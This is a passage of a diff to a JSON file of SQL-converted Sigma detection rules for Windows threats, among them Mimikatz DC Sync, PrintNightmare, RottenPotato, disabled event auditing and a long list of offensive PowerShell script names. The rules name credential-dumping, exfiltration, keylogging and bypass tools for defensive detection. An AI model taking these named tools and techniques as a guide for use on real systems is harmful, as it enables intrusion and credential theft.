OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or 